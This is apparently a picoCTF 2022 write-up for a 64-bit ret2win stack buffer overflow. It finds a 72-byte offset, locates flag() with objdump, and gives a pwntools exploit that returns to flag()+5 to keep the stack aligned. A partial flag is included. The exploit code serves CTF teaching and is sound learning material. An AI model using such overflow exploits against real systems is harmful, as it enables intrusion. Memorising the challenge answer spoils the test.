Skip to main content

x-sixty-what picoCTF 2022 Solution

A 64-bit binary exploitation challenge testing your ability to corrupt the stack and redirect program execution.

Published: July 20, 2023Updated: September 22, 2026

Description

A 64-bit buffer overflow with no stack canary. Overflow the stack buffer to control RIP (the 64-bit instruction pointer) and redirect execution to a flag-printing function.

Key difference from 32-bit: 64-bit binaries use registers (RDI, RSI, RDX...) for the first six arguments, and RIP is 8 bytes wide - addresses must be packed with p64().

Download the binary and make it executable. Get the files from the challenge page on CyLab Security Academy (formerly play.picoctf.org).
Check security mitigations with checksec.
Use pwntools to find the offset and the address of the flag function.
bash
chmod +x vuln
bash
checksec --file=vuln
bash
objdump -d vuln | grep '<flag>'

Solution

Want to try it yourself first?

The guided walkthrough reveals hints one step at a time.

Walk me through it
For a step-by-step walkthrough of stack overflows, ret2win, and ROP scaffolding (cyclic offset, p64 packing, alignment), see the Buffer Overflow Binary Exploitation guide.
  1. Step 1Identify the offset to RIP (it is 72)
    Observation
    checksec shows no stack canary, and the binary reads input with gets(). That is a classic stack overflow, and a cyclic pattern will pinpoint how many bytes reach the saved return address.
    Generate a cyclic pattern, crash the binary, and read RSP (not RIP: in 64-bit the crash registers differ) to compute the offset. With this binary, the answer is 72.
    bash
    # Generate a pattern with unique 8-byte windows and crash the binary:
    cyclic -n 8 200 > pattern.txt
    ./vuln < pattern.txt
    
    # In GDB, repeat the run and read the value at the top of the stack at the crash:
    gdb -q ./vuln -ex 'r < pattern.txt' -ex 'x/gx $rsp'
    
    # Translate the leaked qword back to the offset:
    python3 -c "from pwn import cyclic_find; print(cyclic_find(0x616161616161616a, n=8))"
    # -> 72
    What didn't work first

    Tried: Reading RIP instead of RSP after the crash to find the cyclic offset

    In 64-bit, a ret to a non-canonical address triggers a #GP fault before RIP is updated, so the debugger shows RIP pointing at the ret instruction itself, not at your pattern. RSP holds the top-of-stack value that ret was about to pop, which is where the cyclic bytes land. Always read $rsp at the crash site to get the overwritten saved-rip value.

    Tried: Running cyclic_find without the n=8 keyword argument

    pwntools cyclic defaults to 4-byte unique substrings (n=4), which means each 4-byte window is unique but 8-byte windows may not be. On a 64-bit stack the overwritten slot is 8 bytes wide, so cyclic_find may return a wrong offset or raise a not-found error. Pass n=8 to both cyclic() and cyclic_find() so the pattern has unique 8-byte substrings matching what x86-64 pops.

    Learn more

    x86-64 calling convention (System V AMD64 ABI). The first six integer/pointer arguments go in registers in this order: rdi, rsi, rdx, rcx, r8, r9. Floating-point args go in xmm0..xmm7. Additional args go on the stack. Return value comes back in rax. The stack must be 16-byte aligned at the moment of call.

    Stack at vuln() ret on x86-64:

    high addr  +-------------+
               | saved rip   |  <- 8 bytes, payload[72:80] -> &flag()
               +-------------+
               | saved rbp   |  <- 8 bytes, payload[64:72]
               +-------------+
               | char buf[64]|  <- payload[0:64] = "AAAA..."
    low addr   +-------------+ <- rsp at gets()

    Why crash diagnostics differ from 32-bit. When ret tries to pop a non-canonical address (bits 48-63 must equal bit 47, otherwise the CPU raises #GP), the fault fires before rip is updated. You will see RIP pointing at the ret instruction, not at your pattern. Read $rsp instead to recover the cyclic bytes:

    (gdb) x/gx $rsp
    0x7fffffffe018: 0x616161616161616a   <- this 8-byte value is your pattern
    
    (gdb) shell python3 -c "from pwn import *; print(cyclic_find(0x616161616161616a, n=8))"
    72

    The n=8 matters: pwntools' default cyclic uses 4-byte unique substrings. For 64-bit, generate with cyclic(200, n=8) so each 8-byte window is unique.

  2. Step 2Find the flag() function address
    Observation
    checksec also reports no PIE, so flag() sits at a fixed virtual address on every run. Read it straight from objdump, with no leak and no arithmetic.
    Use objdump or pwntools ELF to locate flag(). Because the binary has no PIE, the address is fixed each run. The objdump line is also a sanity check that the function exists where you expect it.
    bash
    # Confirm the flag() function exists and note its address:
    objdump -d vuln | grep '<flag>:'
    # -> 00000000004011d6 <flag>:
    python3 -c "from pwn import *; e=ELF('./vuln'); print(hex(e.symbols['flag']))"

    Expected output

    00000000004011d6 <flag>:
    0x4011d6
    What didn't work first

    Tried: Using nm -D vuln to look up the flag() address from dynamic symbols

    nm -D only prints symbols exported from the dynamic symbol table (.dynsym), which contains only symbols that need runtime linking. flag() is a local function never intended for external callers, so it appears only in the static symbol table (.symtab). Use objdump -d or nm (without -D) to reach static symbols, or use pwntools ELF which reads .symtab directly.

    Tried: Assuming the flag() address stays the same between local and remote runs when PIE is disabled

    With no PIE, the binary-relative virtual address is fixed across runs of the same binary. However the remote server may run a slightly different build or a different kernel ASLR configuration for the stack and heap - only the .text segment address is locked. The flag() address from objdump is correct to use for the remote, but always double-check checksec output confirms No PIE before trusting a hardcoded address.

    Learn more

    Without PIE (Position-Independent Executable), the binary is loaded at a fixed base address every time. checksec shows "No PIE" if this is the case. This means the virtual address of flag() in objdump output is exactly what you write into the payload - no calculation needed.

    With PIE enabled, the binary would be loaded at a random base address (ASLR for executables), and you would first need to leak an address from the binary to calculate the actual load address before computing flag()'s runtime address.

  3. Step 3Build the 64-bit exploit, skipping endbr64
    Observation
    Returning to the very start of flag() runs its push rbp, which leaves the stack misaligned for the SSE instructions inside printf. Landing five bytes in skips the endbr64 pad and that push, so rsp stays 16-byte aligned.
    Pad 72 bytes, then jump to flag() + 5, which skips the 4-byte endbr64 pad and the 1-byte push rbp and lands on mov rbp,rsp. The reason is stack alignment, not control-flow enforcement. Normally a call leaves rsp at 8 mod 16 on entry and push rbp brings it back to 0 mod 16, which is what the SSE instructions inside printf require. Arriving through an overflow ret shifts that by 8, so letting push rbp run leaves rsp misaligned and printf faults on a movaps. Skipping the push restores the alignment and the function prints the flag.
    python
    python3 -c "
    from pwn import *
    elf = ELF('./vuln')
    
    # flag() starts with endbr64 (4 bytes) + push rbp (1 byte); skipping both keeps rsp 16-byte aligned
    flag_addr = elf.symbols['flag'] + 5   # 0x4011d6 + 5 = 0x4011db
    
    payload  = b'A' * 72       # offset to RIP
    payload += p64(flag_addr)  # land on mov rbp,rsp, past endbr64 and push rbp
    
    p = remote('saturn.picoctf.net', <PORT_FROM_INSTANCE>)
    p.sendlineafter(b'string:', payload)
    print(p.recvall().decode())
    "
    What didn't work first

    Tried: Jumping directly to elf.symbols['flag'] (the endbr64 instruction) instead of flag() + 5

    It does not fault at the jump: endbr64 is a no-op and executing it is harmless. The crash comes later, inside printf, as a SIGSEGV on a movaps instruction. Entering at the top lets push rbp run, and because the overflow ret already shifted rsp by 8 relative to a normal call, that push leaves rsp at 8 mod 16. SSE moves require a 16-byte-aligned address, so printf dies. Landing at flag() + 5 skips the push and keeps the alignment correct.

    Tried: Using p32() to pack the flag() address into the payload

    p32() packs a value as 4 bytes in little-endian order, which is correct for 32-bit x86 exploits where saved-eip is 4 bytes wide. On x86-64, the saved-rip slot is 8 bytes wide and the full 64-bit address must be packed with p64(). Using p32() writes only the low 4 bytes and leaves 4 garbage bytes in the slot, producing a non-canonical or wrong address that causes a fault on ret.

    Learn more

    What is endbr64? Intel CET (Control-flow Enforcement Technology) adds the endbr64 instruction (opcode F3 0F 1E FA, 4 bytes) at the top of every indirectly-callable function. Its Indirect Branch Tracking half constrains indirect branches only: after a call *rax or jmp *rax, the CPU requires the destination to begin with endbr64 and raises a #CP fault otherwise. A ret is not an indirect branch in that sense, so IBT has nothing to say about a ret2win. Returns are the shadow stack's department, and the shadow stack is plainly not enforcing here: if it were, it would reject flag() + 5 exactly as fast as it rejected flag(), and no overflow would ever land. Executing endbr64 itself is always safe, because on a CPU that is not mid-indirect-branch it simply retires as a no-op.

    Why +5 works. The real culprit is stack alignment. The System V AMD64 ABI guarantees rsp is 16-byte aligned at every call; the call pushes 8 bytes, so a function begins life with rsp at 8 mod 16, and its push rbp brings it back to 0 mod 16 for the body. Glibc's printf uses SSE instructions such as movaps, which fault on any address that is not 16-byte aligned. Reaching flag() through an overflow ret shifts that arithmetic by 8, so if push rbp runs the body executes at 8 mod 16 and printf dies on a movaps. The prologue is endbr64 (4 bytes), push rbp (1 byte), then mov rbp,rsp; entering at flag() + 5 skips the push, leaves the alignment correct, and rbp is still set from rsp on the very next instruction. Adding a bare ret gadget before the target address is the other standard fix, and it works for the same reason.

    Finding the safe address. Disassemble flag() with objdump -d vuln | grep -A 5 '<flag>:' to see the exact byte layout for this build. The address you want is the one labeled mov rbp,rsp. Alternatively, compute it as elf.symbols['flag'] + 5 in pwntools, which gives the same address directly.

    p64(addr) packs a 64-bit address as 8 bytes in little-endian order, which is what x86-64 stores on the stack. This is the 64-bit counterpart of p32() used in 32-bit exploits.

Interactive tools
  • Cyclic Pattern GeneratorGenerate de Bruijn cyclic patterns and find buffer overflow offsets. The browser equivalent of pwntools cyclic and cyclic_find.
  • pwntools Payload BuilderPack integers into little-endian bytes (p32 / p64), unpack bytes back to integers, and build flat ROP payloads with offset-based insertion.

Flag

Reveal flag

picoCTF{b1663r_15_b3773r_3...}

Overflow 72 bytes to RIP, then jump to flag()+5, which skips endbr64 and push rbp so that rsp stays 16-byte aligned for the SSE instructions inside printf. Pack the 64-bit address with p64().

Key takeaway

Stack buffer overflows in 64-bit binaries follow the same principle as 32-bit: fill the buffer, overwrite the saved return address, and redirect execution. The key differences are that addresses are 8 bytes wide (packed with p64 in little-endian), the calling convention passes arguments in registers rather than on the stack, and Intel CET's endbr64 marker is a no-op that only constrains indirect jmp and call targets, so it is not what forces the payload a few bytes past the function start; that offset is stack alignment, because arriving through an overflow ret shifts rsp by 8 and skipping the prologue's push rbp puts the SSE instructions inside printf back on a 16-byte boundary. The same ret2win pattern scales up to full ROP chains once no-execute protections are added.

Related reading

Tools used in this challenge

Where to go next